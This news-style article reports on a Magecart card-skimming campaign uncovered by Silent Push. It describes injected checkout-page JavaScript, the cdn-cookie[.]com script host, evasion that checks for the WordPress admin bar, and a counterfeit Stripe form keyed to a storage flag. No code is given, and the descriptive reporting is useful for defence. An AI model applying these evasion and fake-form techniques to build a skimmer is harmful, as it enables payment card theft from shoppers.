A clandestine data exfiltration campaign, designed to intercept credit card credentials from digital payment gateways, operated surreptitiously for nearly a biennium before its discovery. The adversaries targeted a vast clientele across preeminent payment networks, including American Express, Mastercard, Discover, Diners Club, JCB, and UnionPay. The magnitude of this offensive was only recently unveiled when researchers at Silent Push scrutinized anomalous activity tethered to domains managed by a hosting provider under the Dutch entity, WorkTitans B.V.
Throughout the incursion, the perpetrators embedded deleterious JavaScript snippets within the checkout pages of authentic e-commerce platforms. This code activates during the procurement process, siphoning sensitive user inputs: card numbers, expiration dates, CVC codes, alongside personal identifiers such as names, shipping addresses, and contact details. This harvested intelligence was subsequently transmitted to a remote server via HTTP requests.
A hallmark of this operation was the strategic utilization of the domain cdn-cookie[.]com, which served as a repository for encrypted scripts like recorder.js and tab-gtm.js. These components were loaded by web storefronts to facilitate the hidden operation of the malicious architecture. One of the primary anti-forensic mechanisms involved auditing the page for the wpadminbar element—a signature of the WordPress administrative interface. If such an element were detected, the script would immediately self-destruct to evade scrutiny.
The script demonstrated remarkable adaptability to various payment modalities. For instance, when encountering a Stripe integration, the malware would verify the presence of a specific browser storage flag—the wc_cart_hash. If absent, the victim was presented with a sophisticated counterfeit payment form, meticulously styled to mirror the authentic interface. Upon data entry, the system would simulate a credential error, prompting the user to re-enter their details while the information was surreptitiously dispatched to the attackers. Subsequently, the storage flag was set to prevent redundant engagement with the same victim.
The unearthed scheme reflects an elevated echelon of technical craftsmanship. The architects exhibited a profound understanding of the WordPress architecture, integrating obscure systemic features into their attack sequence. The hosting infrastructure for these malicious components, originally associated with Stark Industries and PQ.Hosting, was rebranded as THE[.]Hosting—likely a maneuver to circumvent geopolitical sanction pressures.
This campaign is attributed to the Magecart lineage of threats, which historically targeted vulnerabilities within Magento but has since evolved to exploit a diverse array of platforms. Ultimately, this offensive directed at global payment systems underscores the burgeoning complexity and relentless sophistication of contemporary online threats.